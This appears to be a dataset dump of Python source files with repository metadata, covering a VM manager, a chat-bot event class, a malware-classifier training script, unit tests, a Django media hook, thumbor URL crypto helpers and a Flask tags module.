| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b7d5c05e7bdbe4c159664bc93dea9d1f8df223
| 1,917
|
py
|
Python
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 10
|
2018-06-10T17:54:57.000Z
|
2022-02-07T19:37:07.000Z
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 10
|
2018-06-10T18:46:07.000Z
|
2021-05-13T13:01:22.000Z
|
src/vmshepherd/app.py
|
DreamLab/VmShepherd
|
f602bb814080d2d3f62c6cb5fa6b9dd685833c24
|
[
"Apache-2.0"
] | 3
|
2019-07-18T14:10:10.000Z
|
2022-02-07T19:37:08.000Z
|
import asyncio
import logging
import os
from vmshepherd.drivers import Drivers
from vmshepherd.http import WebServer
from vmshepherd.utils import gen_id, prefix_logging
from vmshepherd.worker import Worker
class VmShepherd:
def __init__(self, config):
self.config = config
self.root_dir = os.path.dirname(__file__)
self.instance_id = gen_id(rnd_length=5)
self.setup_logging()
self.runtime_manager = Drivers.get(
'runtime', self.config['runtime'],
instance_id=self.instance_id
)
self.preset_manager = Drivers.get(
'presets', self.config['presets'],
runtime=self.runtime_manager,
defaults=self.config.get('defaults', {})
)
self.worker = Worker(
runtime=self.runtime_manager, presets=self.preset_manager,
interval=int(self.config.get('worker_interval', 5)),
autostart=self.config.get('autostart', True)
)
http_conf = self.config.get('http', None)
if http_conf:
self.web = WebServer(self, http_conf)
asyncio.ensure_future(self.web.start())
async def run(self, run_once=False):
if run_once:
await self.worker.run_once()
else:
await self.worker.run_forever()
def setup_logging(self):
logger = logging.getLogger()
log_level = self.config.get('log_level', 'info').upper()
logger.setLevel(log_level)
if logger.getEffectiveLevel() == logging.DEBUG:
logging.debug('DEBUG mode enabled')
prefix_logging(self.instance_id)
def reload(self, with_config=None):
self.config = with_config or self.config
self.runtime_manager.reconfigure(self.config.get('runtime'))
self.preset_manager.reconfigure(self.config.get('presets'), self.config.get('defaults'))
Drivers.flush()
| 32.491525
| 96
| 0.639019
| 226
| 1,917
| 5.238938
| 0.30531
| 0.118243
| 0.087838
| 0.033784
| 0.052365
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001394
| 0.251435
| 1,917
| 58
| 97
| 33.051724
| 0.823693
| 0
| 0
| 0
| 0
| 0
| 0.061033
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.145833
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b84e52e79d954ea22decc10bdcb695a3cc56e1
| 1,762
|
py
|
Python
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 1
|
2020-04-29T20:44:44.000Z
|
2020-04-29T20:44:44.000Z
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 10
|
2019-06-22T11:18:55.000Z
|
2019-09-03T13:26:47.000Z
|
opsdroid/connector/slack/events.py
|
himanshu1root/opsdroid
|
26699c5e7cc014a0d3ab74baf66fbadce939ab73
|
[
"Apache-2.0"
] | 1
|
2019-06-11T22:30:49.000Z
|
2019-06-11T22:30:49.000Z
|
"""Classes to describe different kinds of Slack specific event."""
import json
from opsdroid.events import Message
class Blocks(Message):
"""A blocks object.
Slack uses blocks to add advenced interactivity and formatting to messages.
https://api.slack.com/messaging/interactivity
Blocks are provided in JSON format to Slack which renders them.
Args:
blocks (string or dict): String or dict of json for blocks
room (string, optional): String name of the room or chat channel in
which message was sent
connector (Connector, optional): Connector object used to interact with
given chat service
raw_event (dict, optional): Raw message as provided by chat service.
None by default
Attributes:
created: Local date and time that message object was created
user: String name of user sending message
room: String name of the room or chat channel in which message was sent
connector: Connector object used to interact with given chat service
blocks: Blocks JSON as string
raw_event: Raw message provided by chat service
raw_match: A match object for a search against which the message was
matched. E.g. a regular expression or natural language intent
responded_to: Boolean initialized as False. True if event has been
responded to
"""
def __init__(self, blocks, *args, **kwargs):
"""Create object with minimum properties."""
super().__init__("", *args, **kwargs)
self.blocks = blocks
if isinstance(self.blocks, list):
self.blocks = json.dumps(self.blocks)
| 39.155556
| 79
| 0.648127
| 224
| 1,762
| 5.044643
| 0.441964
| 0.044248
| 0.031858
| 0.026549
| 0.204425
| 0.204425
| 0.204425
| 0.204425
| 0.204425
| 0.125664
| 0
| 0
| 0.296254
| 1,762
| 44
| 80
| 40.045455
| 0.91129
| 0.76277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b95e3837c6ec2e9141c7cfae3e53054b21d5b5
| 3,449
|
py
|
Python
|
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
src/train.py
|
SYHPARK/MalConv-keras
|
2b68ba82e2201290130bed6d58f5725b17a87867
|
[
"MIT"
] | null | null | null |
from os.path import join
import argparse
import pickle
import warnings
import pandas as pd
from keras.callbacks import ModelCheckpoint, EarlyStopping
from keras.models import load_model
import utils
from malconv import Malconv
from preprocess import preprocess
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser(description='Malconv-keras classifier training')
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--verbose', type=int, default=1)
parser.add_argument('--epochs', type=int, default=100)
parser.add_argument('--limit', type=float, default=0., help="limit gpy memory percentage")
parser.add_argument('--max_len', type=int, default=200000, help="model input legnth")
parser.add_argument('--win_size', type=int, default=500)
parser.add_argument('--val_size', type=float, default=0.1, help="validation percentage")
parser.add_argument('--save_path', type=str, default='../saved/', help='Directory to save model and log')
parser.add_argument('--model_path', type=str, default='../saved/malconv.h5', help="model to resume")
parser.add_argument('--save_best', action='store_true', help="Save model with best validation accuracy")
parser.add_argument('--resume', action='store_true')
parser.add_argument('csv', type=str)
def train(model, max_len=200000, batch_size=64, verbose=True, epochs=100, save_path='../saved/', save_best=True):
# callbacks
ear = EarlyStopping(monitor='val_acc', patience=5)
mcp = ModelCheckpoint(join(save_path, 'malconv.h5'),
monitor="val_acc",
save_best_only=save_best,
save_weights_only=False)
print("[*] x_train length: ", len(x_train))
print("[*] y_train length: ", len(y_train))
print("[*] x_test length: ", len(x_test))
print("[*] y_test length: ", len(y_test))
validation_data=utils.data_generator(x_test, y_test, max_len, batch_size)
print("[*] validation_data: ", validation_data)
history = model.fit_generator(
utils.data_generator(x_train, y_train, max_len, batch_size, shuffle=True),
steps_per_epoch=len(x_train)//batch_size + 1,
epochs=epochs,
verbose=verbose,
callbacks=[ear, mcp],
validation_data=utils.data_generator(x_test, y_test, max_len, batch_size),
validation_steps=len(x_test)//batch_size + 1)
return history
if __name__ == '__main__':
args = parser.parse_args()
# limit gpu memory
if args.limit > 0:
utils.limit_gpu_memory(args.limit)
print("[*] Flag0")
# prepare model
if args.resume:
model = load_model(args.model_path)
else:
model = Malconv(args.max_len, args.win_size)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])
print("[*] Flag1")
# prepare data
# preprocess is handled in utils.data_generator
df = pd.read_csv(args.csv, header=None)
data, label = df[0].values, df[1].values
x_train, x_test, y_train, y_test = utils.train_test_split(data, label, args.val_size)
print('Train on %d data, test on %d data' % (len(x_train), len(x_test)))
print("[*] Flag2")
history = train(model, args.max_len, args.batch_size, args.verbose, args.epochs, args.save_path, args.save_best)
print("[*] Flag3")
with open(join(args.save_path, 'history.pkl'), 'wb') as f:
pickle.dump(history.history, f)
| 40.104651
| 116
| 0.684836
| 477
| 3,449
| 4.740042
| 0.278826
| 0.047766
| 0.090226
| 0.02521
| 0.070765
| 0.05042
| 0.05042
| 0.05042
| 0.05042
| 0.05042
| 0
| 0.014396
| 0.174253
| 3,449
| 85
| 117
| 40.576471
| 0.779494
| 0.028704
| 0
| 0
| 0
| 0
| 0.178582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.153846
| 0
| 0.184615
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bc28a5d5d38a212f5e0f03eba96a2a3f217595
| 1,870
|
py
|
Python
|
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
unittesting.py
|
slobbishbody/routegetter
|
b6c279c1734530fd2aec08da9317575b66150092
|
[
"MIT"
] | null | null | null |
'''We will test all routegetter methods in this test suite'''
from os.path import join, abspath, sep
import unittest
import logging
import routesparser
from faker import Faker
LOG_FILE = join(sep.join(sep.split(abspath(__file__))[:-1]), 'log', 'testing', 'testing.log')
class RoutesGetterTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.log = logging.getLogger('RouteGetterTests')
cls.log.setLevel(logging.DEBUG)
cls.routegetter = routesparser.RouteGetter(url='http://www.cyride.com/index.aspx'
, payload={'page':1212})
cls.data_generator = Faker()
def setUp(self):
self.bad_url = self.data_generator.url()
def test_cyride_request(self):
'''we want to test that our request succeeds at cyride'''
log = self.log.getChild('test_cyride_request')
request = self.routegetter.request
self.assertNotEqual(request.status_code, 404)
log.debug('%s, %s', request.url, request)
@unittest.expectedFailure
def test_bad_url(self):
log = self.log.getChild('test_bad_url')
request = routesparser.get_request(self.bad_url)
self.assertEqual(request.status_code, 404)
log.debug(request.url, request)
class RoutesParserTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.log = logging.getLogger('RouteParserTests')
cls.log.setLevel(logging.DEBUG)
cls.routeparser = routesparser.RouteParser()
def test_souped_data(self):
log = self.log.getChild('test_souped_data')
pretty_html = self.routeparser.pretty_html
self.assertIsNotNone(self.routeparser.pretty_html)
log.info(pretty_html.title.string)
if __name__ == '__main__':
logging.basicConfig(filename=LOG_FILE, filemode='w')
unittest.main()
| 33.392857
| 93
| 0.673797
| 222
| 1,870
| 5.509009
| 0.378378
| 0.028618
| 0.02453
| 0.044154
| 0.260016
| 0.242028
| 0.106296
| 0.106296
| 0.106296
| 0.106296
| 0
| 0.007458
| 0.21123
| 1,870
| 55
| 94
| 34
| 0.821695
| 0.057219
| 0
| 0.146341
| 0
| 0
| 0.086187
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 1
| 0.146341
| false
| 0
| 0.121951
| 0
| 0.317073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bc5072826fedfaeb9d7bc762e8a4e79ddf3354
| 961
|
py
|
Python
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 29
|
2017-12-12T04:51:47.000Z
|
2021-12-16T13:33:30.000Z
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 18
|
2017-11-16T17:57:59.000Z
|
2018-01-30T11:05:29.000Z
|
side8/k8s/operator/utils.py
|
side8/k8s-operator
|
4097d91c39596993fcd21c2e9158796f83f7ea6f
|
[
"Apache-2.0"
] | 6
|
2018-10-01T16:37:45.000Z
|
2021-05-07T02:34:44.000Z
|
def parse(o, prefix=""):
def flatten(lis):
new_lis = []
for item in lis:
if isinstance(item, list):
new_lis.extend(flatten(item))
else:
new_lis.append(item)
return new_lis
try:
return {
"str": lambda: (prefix, o),
"int": lambda: parse(str(o), prefix=prefix),
"float": lambda: parse(str(o), prefix=prefix),
"bool": lambda: parse(1 if o else 0, prefix=prefix),
"NoneType": lambda: parse("", prefix=prefix),
"list": lambda: flatten([parse(io, "{}{}{}".format(prefix, "_" if prefix else "", ik).upper()) for ik, io in enumerate(o)]),
"dict": lambda: flatten([parse(io, "{}{}{}".format(prefix, "_" if prefix else "", ik).upper()) for ik, io in o.items()]),
}[type(o).__name__]()
except KeyError:
raise ValueError("type '{}' not supported".format(type(o).__name__))
| 41.782609
| 136
| 0.522373
| 115
| 961
| 4.243478
| 0.356522
| 0.04918
| 0.057377
| 0.061475
| 0.356557
| 0.356557
| 0.245902
| 0.245902
| 0.245902
| 0.245902
| 0
| 0.002963
| 0.297607
| 961
| 22
| 137
| 43.681818
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0.07076
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9bca9a508473ab1f3f0748890578a6eb5bddb04
| 710
|
py
|
Python
|
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
setup.py
|
thetongs/hello_world
|
5c2ab413cd104ed6d8a5640ee6fd3476d0f1e846
|
[
"MIT"
] | null | null | null |
from setuptools import setup
VERSION = '0.0.4'
DESCRIPTION = 'Hello world checking'
# Setting up
setup(
name="hello_world",
version=VERSION,
author="Kishan Tongrao",
author_email="kishan.tongs@gmail.com",
description=DESCRIPTION,
long_description_content_type="text/markdown",
packages=['hello_world'],
include_package_data=True,
install_requires=[],
classifiers=[
"Development Status :: 1 - Planning",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Operating System :: Unix",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
)
| 28.4
| 52
| 0.625352
| 70
| 710
| 6.214286
| 0.742857
| 0.068966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009416
| 0.252113
| 710
| 25
| 53
| 28.4
| 0.809793
| 0.014085
| 0
| 0
| 0
| 0
| 0.438519
| 0.032593
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.045455
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9c93db3dbc0d8e8af8b81d596af15d7ca55058b
| 2,228
|
py
|
Python
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 6
|
2021-01-26T17:22:53.000Z
|
2022-02-15T10:09:03.000Z
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 5
|
2020-12-24T14:29:23.000Z
|
2021-08-10T10:32:18.000Z
|
src/cms/medias/hooks.py
|
UniversitaDellaCalabria/uniCMS
|
b0af4e1a767867f0a9b3c135a5c84587e713cb71
|
[
"Apache-2.0"
] | 2
|
2020-12-24T14:13:39.000Z
|
2020-12-30T16:48:52.000Z
|
import logging
import magic
import os
from cms.medias.utils import get_file_type_size
from django.conf import settings
from django.core.files.uploadedfile import InMemoryUploadedFile
from . import settings as app_settings
from . utils import to_webp
logger = logging.getLogger(__name__)
FILETYPE_IMAGE = getattr(settings, 'FILETYPE_IMAGE',
app_settings.FILETYPE_IMAGE)
def set_file_meta(media_object):
data = get_file_type_size(media_object)
media_object.file_size = data['file_size']
media_object.file_type = data['mime_type']
def webp_image_optimizer(media_object):
for field_name in ('file', 'image'):
field = getattr(media_object, field_name, None)
if field:
break
if not getattr(field, '_file', None): # pragma: no cover
return
mimetype = magic.Magic(mime=True).from_buffer(field._file.file.read())
if mimetype in FILETYPE_IMAGE:
field._file.seek(0)
byte_io = to_webp(field._file)
byte_io.seek(0, os.SEEK_END)
content_size = byte_io.tell()
byte_io.seek(0)
fname = '.'.join(field.name.split('.')[:-1]) + '.webp'
field._file = InMemoryUploadedFile(file = byte_io,
name = fname,
content_type = 'image/webp',
size = content_size,
charset='utf-8',
field_name = field_name)
field._file._name = fname
field.name = fname
field._file.size = content_size
field._file.content_type = 'image/webp'
# if they are valuable ... otherwise nothins happens to model
media_object.file_size = content_size
media_object.file_type = 'image/webp'
logger.info(f'Image {fname} converted from {mimetype} to {media_object.file_type}')
return True
def remove_file(media_object):
fpath = media_object.file.path
try:
os.remove(fpath)
except Exception as e: # pragma: no cover
_msg = 'Media Hook remove_file: {} cannot be removed: {}'
logger.error(_msg.format(fpath, e))
| 32.289855
| 91
| 0.609964
| 271
| 2,228
| 4.756458
| 0.332103
| 0.093871
| 0.069822
| 0.04422
| 0.035687
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003193
| 0.297127
| 2,228
| 68
| 92
| 32.764706
| 0.819923
| 0.041741
| 0
| 0
| 0
| 0
| 0.09526
| 0.011262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.156863
| 0
| 0.254902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9cba2d718dc17bd9bd34864d1e448f3f16a9751
| 8,840
|
py
|
Python
|
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
tests/thumbor.py
|
hurbcom/libthumbor
|
8362f08071ed1ce345be59713825844808873a80
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
import base64
import hashlib
import hmac
import re
import six
from six.moves.urllib.parse import quote
from Crypto.Cipher import AES
class Url(object):
unsafe_or_hash = r'(?:(?:(?P<unsafe>unsafe)|(?P<hash>[^/]{28,}?))/)?'
debug = '(?:(?P<debug>debug)/)?'
meta = '(?:(?P<meta>meta)/)?'
trim = '(?:(?P<trim>trim(?::(?:top-left|bottom-right))?(?::\d+)?)/)?'
crop = '(?:(?P<crop_left>\d+)x(?P<crop_top>\d+):(?P<crop_right>\d+)x(?P<crop_bottom>\d+)/)?'
fit_in = '(?:(?P<adaptive>adaptive-)?(?P<full>full-)?(?P<fit_in>fit-in)/)?'
dimensions = '(?:(?P<horizontal_flip>-)?(?P<width>(?:\d+|orig))?x(?P<vertical_flip>-)?(?P<height>(?:\d+|orig))?/)?'
halign = r'(?:(?P<halign>left|right|center)/)?'
valign = r'(?:(?P<valign>top|bottom|middle)/)?'
smart = r'(?:(?P<smart>smart)/)?'
filters = r'(?:filters:(?P<filters>.+?\))/)?'
image = r'(?P<image>.+)'
compiled_regex = None
@classmethod
def regex(cls, has_unsafe_or_hash=True):
reg = ['/?']
if has_unsafe_or_hash:
reg.append(cls.unsafe_or_hash)
reg.append(cls.debug)
reg.append(cls.meta)
reg.append(cls.trim)
reg.append(cls.crop)
reg.append(cls.fit_in)
reg.append(cls.dimensions)
reg.append(cls.halign)
reg.append(cls.valign)
reg.append(cls.smart)
reg.append(cls.filters)
reg.append(cls.image)
return ''.join(reg)
@classmethod
def parse_decrypted(cls, url):
if cls.compiled_regex:
reg = cls.compiled_regex
else:
reg = cls.compiled_regex = re.compile(cls.regex(has_unsafe_or_hash=False))
result = reg.match(url)
if not result:
return None
result = result.groupdict()
int_or_0 = lambda value: 0 if value is None else int(value)
values = {
'debug': result['debug'] == 'debug',
'meta': result['meta'] == 'meta',
'trim': result['trim'],
'crop': {
'left': int_or_0(result['crop_left']),
'top': int_or_0(result['crop_top']),
'right': int_or_0(result['crop_right']),
'bottom': int_or_0(result['crop_bottom'])
},
'adaptive': result['adaptive'] == 'adaptive',
'full': result['full'] == 'full',
'fit_in': result['fit_in'] == 'fit-in',
'width': result['width'] == 'orig' and 'orig' or int_or_0(result['width']),
'height': result['height'] == 'orig' and 'orig' or int_or_0(result['height']),
'horizontal_flip': result['horizontal_flip'] == '-',
'vertical_flip': result['vertical_flip'] == '-',
'halign': result['halign'] or 'center',
'valign': result['valign'] or 'middle',
'smart': result['smart'] == 'smart',
'filters': result['filters'] or '',
'image': 'image' in result and result['image'] or None
}
return values
@classmethod
def generate_options(cls,
debug=False,
width=0,
height=0,
smart=False,
meta=False,
trim=None,
adaptive=False,
full=False,
fit_in=False,
horizontal_flip=False,
vertical_flip=False,
halign='center',
valign='middle',
crop_left=None,
crop_top=None,
crop_right=None,
crop_bottom=None,
filters=None):
url = []
if debug:
url.append('debug')
if meta:
url.append('meta')
if trim:
if isinstance(trim, bool):
url.append('trim')
else:
url.append('trim:%s' % trim)
crop = crop_left or crop_top or crop_right or crop_bottom
if crop:
url.append('%sx%s:%sx%s' % (
crop_left,
crop_top,
crop_right,
crop_bottom
))
if fit_in:
fit_ops = []
if adaptive:
fit_ops.append('adaptive')
if full:
fit_ops.append('full')
fit_ops.append('fit-in')
url.append('-'.join(fit_ops))
if horizontal_flip:
width = '-%s' % width
if vertical_flip:
height = '-%s' % height
if width or height:
url.append('%sx%s' % (width, height))
if halign != 'center':
url.append(halign)
if valign != 'middle':
url.append(valign)
if smart:
url.append('smart')
if filters:
url.append('filters:%s' % filters)
return '/'.join(url)
@classmethod
def encode_url(kls, url):
return quote(url, '/:?%=&()~",\'')
class Cryptor(object):
def __init__(self, security_key):
if isinstance(security_key, six.string_types):
security_key = security_key.encode('utf-8')
self.security_key = (security_key * 16)[:16]
def encrypt(self,
width,
height,
smart,
adaptive,
full,
fit_in,
flip_horizontal,
flip_vertical,
halign,
valign,
trim,
crop_left,
crop_top,
crop_right,
crop_bottom,
filters,
image):
generated_url = Url.generate_options(
width=width,
height=height,
smart=smart,
meta=False,
adaptive=adaptive,
full=full,
fit_in=fit_in,
horizontal_flip=flip_horizontal,
vertical_flip=flip_vertical,
halign=halign,
valign=valign,
trim=trim,
crop_left=crop_left,
crop_top=crop_top,
crop_right=crop_right,
crop_bottom=crop_bottom,
filters=filters
)
url = "%s/%s" % (generated_url, hashlib.md5(image.encode('utf-8')).hexdigest())
pad = lambda b: b + (16 - len(b) % 16) * b"{"
cipher = AES.new(self.security_key)
encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url.encode('utf-8'))))
return encrypted.decode('utf-8')
def get_options(self, encrypted_url_part, image_url):
try:
opt = self.decrypt(encrypted_url_part)
except ValueError:
opt = None
if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
security_key = self.storage.get_crypto(image_url)
if security_key is not None:
cr = Cryptor(security_key)
try:
opt = cr.decrypt(encrypted_url_part)
except ValueError:
opt = None
if opt is None:
return None
image_hash = opt and opt.get('image_hash')
image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash
path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()
if not image_hash or image_hash != path_hash:
return None
opt['image'] = image_url
opt['hash'] = opt['image_hash']
del opt['image_hash']
return opt
def decrypt(self, encrypted):
cipher = AES.new(self.security_key)
# try:
debased = base64.urlsafe_b64decode(encrypted.encode('utf-8'))
decrypted = cipher.decrypt(debased).rstrip(b'{').decode('utf-8')
# except TypeError:
# return None
result = Url.parse_decrypted('/%s' % decrypted)
result['image_hash'] = result['image']
del result['image']
return result
class Signer:
def __init__(self, security_key):
if isinstance(security_key, six.string_types):
security_key = security_key.encode('utf-8')
self.security_key = security_key
def validate(self, actual_signature, url):
url_signature = self.signature(url)
return url_signature == actual_signature
def signature(self, url):
result = base64.urlsafe_b64encode(
hmac.new(self.security_key, url.encode('utf-8'), hashlib.sha1).digest())
# hmac.new(self.security_key, unicode(url).encode('utf-8'), hashlib.sha1).digest())
return result.decode()
| 30.801394
| 119
| 0.508145
| 972
| 8,840
| 4.447531
| 0.144033
| 0.050891
| 0.03331
| 0.016655
| 0.174185
| 0.141106
| 0.117511
| 0.103632
| 0.076336
| 0.054129
| 0
| 0.008764
| 0.354638
| 8,840
| 286
| 120
| 30.909091
| 0.748992
| 0.015385
| 0
| 0.135965
| 0
| 0.013158
| 0.126581
| 0.057714
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048246
| false
| 0
| 0.030702
| 0.004386
| 0.201754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9d237ae48e81118b5aaea91722859235e40aa06
| 1,599
|
py
|
Python
|
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | 7
|
2015-01-22T14:32:55.000Z
|
2021-07-14T02:54:42.000Z
|
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | null | null | null |
flaskrst/modules/tags.py
|
jarus/flask-rst
|
05b6a817f5986d6f6a4552d16a133deb8859ce3e
|
[
"BSD-3-Clause"
] | 2
|
2016-03-14T01:06:13.000Z
|
2016-04-15T13:26:54.000Z
|
# -*- coding: utf-8 -*-
"""
flask-rst.modules.tags
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2011 by Christoph Heer.
:license: BSD, see LICENSE for more details.
"""
from math import log
from flask import Blueprint, render_template
from jinja2 import Markup
from flaskrst.modules.blog import posts
def get_tags():
tags = {}
for post in posts:
post_tags = [tag.lower() for tag in post.config.get('tags', [])]
for tag in post_tags:
if tag not in tags:
tags[tag] = 1
else:
tags[tag] += 1
return tags
def get_posts_by_tag(name):
posts_with_tag = []
for post in posts:
post_tags = [tag.lower() for tag in post.config.get('tags', [])]
for tag in post_tags:
if tag == name and post not in posts_with_tag:
posts_with_tag.append(post)
return posts_with_tag
def template_tags(doc):
tags = [tag.lower() for tag in doc.config.get('tags', [])]
return Markup(render_template('tags_inside_post.html', tags=tags))
tags = Blueprint('tags', __name__)
@tags.route("/tags/")
def cloud():
tags = get_tags()
for tag in tags:
tags[tag] = 100 + log(tags[tag] or 1) * 20
return render_template('tags_cloud.html',
tags=tags
)
@tags.route("/tags/<tag>/")
def tag(tag):
blog_posts = get_posts_by_tag(tag)
return render_template('tags_taged_with.html',
tag=tag,
blog_posts=blog_posts
)
def setup(app, cfg):
app.jinja_env.globals['tags'] = template_tags
app.register_blueprint(tags)
| 26.213115
| 72
| 0.605378
| 225
| 1,599
| 4.124444
| 0.28
| 0.060345
| 0.051724
| 0.051724
| 0.201509
| 0.185345
| 0.163793
| 0.163793
| 0.163793
| 0.163793
| 0
| 0.011814
| 0.258912
| 1,599
| 61
| 73
| 26.213115
| 0.771308
| 0.09631
| 0
| 0.136364
| 0
| 0
| 0.066291
| 0.01481
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.090909
| 0
| 0.340909
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9d8ca7a24eddf8714bfa4046edd0feee39e2a38
| 1,283
|
py
|
Python
|
lib/core/network.py
|
lck1201/seq2seq-3Dpose
|
